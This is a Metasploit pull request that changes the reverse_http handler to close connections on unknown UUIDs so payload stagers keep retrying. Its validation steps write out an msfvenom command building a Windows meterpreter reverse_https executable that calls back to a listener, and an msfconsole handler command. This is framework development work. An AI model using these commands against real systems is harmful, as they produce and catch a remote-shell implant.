### PR TITLE
don't send a response on invalid UUID, allow stagers to survive another day

### DIFF
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -378,16 +378,15 @@ protected
         unless [:unknown_uuid, :unknown_uuid_url].include?(info[:mode])
           print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{request_summary}")
         end
-        resp.code    = 200
-        resp.message = 'OK'
-        resp.body    = datastore['HttpUnknownRequestResponse'].to_s
+        resp = nil
+        sleep(1)
         self.pending_connections -= 1
     end
 
     cli.send_response(resp) if (resp)
 
     # Force this socket to be closed
-    obj.service.close_client( cli )
+    obj.service.close_client(cli)
   end
 
 end

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -379,7 +379,6 @@ protected
           print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{request_summary}")
         end
         resp = nil
-        sleep(1)
         self.pending_connections -= 1
     end
 


### PR DESCRIPTION
Currently, if we see an invalid UUID, we send a 200 OK response with no content, which promptly kills the stager. While arguably the stager should be more resilient to such a thing (well, that's what SSL verification is for I suppose), if you have a mis configuration in Metaploit, this shouldn't cause you to lose a shell either.

It's nicer to allow the stager to continue its normal retries. To do this, we simply shut down the connection if the UUID is incorrect. That causes the error handling code in stagers to work as expected. If we wanted to send something like a 404, we'd have to grow the error checking code in winhttp and others substantially, since it's not a matter of just checking return codes.
# Room for future improvement

It would be nice to add a tarpit delay to a scanner, but this probably also slows down the handler processing. It would also be nice if retries in stagers didn't happen so quickly - a misconfig can make the stager spin fairly 'enthusiastically' constantly retrying if you set retry to a high number.
# Validation Steps
- [x] Generate a stager payload, like so:

```
./msfvenom -p windows/meterpreter/reverse_https -f exe -o test.exe LHOST=192.168.56.1 StagerRetryCount=4
```
- [x] Start a validating handler:

```
./msfconsole -qx 'use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set lhost 192.168.56.1; set IgnoreUnknownPayloads true; run'
```
- [x] Observe that it retries instead of crashing on connnect

We should also check out adding more transports and verifying that the payload moves to the next one.
